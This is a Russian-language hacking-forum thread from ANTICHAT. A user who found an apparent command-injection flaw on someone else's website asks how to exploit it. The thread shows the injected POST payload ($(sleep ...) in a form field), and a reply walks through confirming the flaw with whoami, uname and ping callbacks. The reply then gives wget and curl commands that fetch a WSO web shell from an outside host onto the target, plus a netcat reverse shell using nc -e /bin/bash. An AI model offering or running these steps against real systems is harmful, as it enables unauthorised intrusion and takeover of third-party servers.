ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

04.09.2019, 11:32
|
|
Guest
Провел на форуме: 4501
|
|
Добрый день.
Автоматический поиск уязвимостей на одном из сайтов нашел экзотическую для меня уязвимость "Внедрение команды оболочки в параметры файла"
POST *****/?page_num=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://*****/r=1
Cookie: PHPSESSID=******
Connection: Keep-Alive
Host: ********
Content-Length: 94
Accept: text/html,application/xhtml+xml,application/xml;q=0.9;q=0.8
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
action=support&subject=1234$( ../../../../../../../../../../../../bin/sleep 11)&message=25
Как корректно вставить команду заливки шела и просмотра содержимого каталога?
Что то мои скудные познания в Nix-системах не дают результатов.
Прошу набросать пару толковых примеров.
|
|
|
|

04.09.2019, 14:21
|
|
Guest
Провел на форуме: 213865
|
|
|
|
|
|

06.09.2019, 08:41
|
|
Guest
Провел на форуме: 4501
|
|
А можно на мануал или статью? По линку ничего толкового не увидел.
|
|
|
|

06.09.2019, 10:41
|
|
Guest
Провел на форуме: 92829
|
|
Ну для начала я советую вам удостоверится что уязвимость действительно есть, так как сканеры имеюют характерное свойство - ошибаться
- Отправить запрос с командой sleep 100 к примеру и посмотреть на ответ сервера, точнее время, если через 100 сек то уязвимсоть присутствует, если нет пробуем дальше
- Если есть вывод на страницу, то элементарные команды whoami uname выведут информацию о пользователе и хосте соответственно
- Последний вариант - это команды ping {ip адресс вашего сервера} - а там смотреть в логах ip адрес атакуемого хоста, конкретно access.log
Список расположения логов можно посмотреть в этой теме(если возникнут проблемы) - /threads/324564/
Для просмотра содержимого каталога не требуется шелл - вы можете и так гулять по системе в соответствии с вашими привелегиями так как у вас rce - возможность выполнять команды системной оболочки. Команды cd, ls, cat помогут вам в этом(при условии что есть вывод), но если вывода нет то да,
лучше залить шелл или можем попытаться "подключить" обратный(reverse) шелл.
Если выше способы не дали результатов я бы посчитал что уязвимсоти нет - иначе как сканер смог засечь задержку(выполнение команды sleep 11), но если мы знаем путь до директори, доступной из веб, можем попытаться залить шелл, последняя попытка - утилиты wget, curl
Код:
Code:
wget http://site.com/wso.txt -O /путь/до/сервера/name_shell.php
аналогично curl
Код:
Code:
curl http://site.com/wso.txt -o /путь/до/сервера/name_shell.php
вариант для обратного шелла
на своем сервере
Код:
Code:
nc -lvp {номер порта для прослушки}
на аткуемом
Код:
Code:
nc {ip вашего сервера} {port} -e /bin/bash
возможно вместо /bin/bash нужно будет указать /bin/sh и поиграться с парметрами нетката
Но для начала я советую вам установить линукс, хотя бы на виртуальную машину, потыкать посмотреть что да как. Ну и успехов вам)
ps
готов поспорить что там ничего нет, каким-нибудь vega тестили?) просто он постояяно такое выдает, интересно)
|
|
|
|
|
 |
|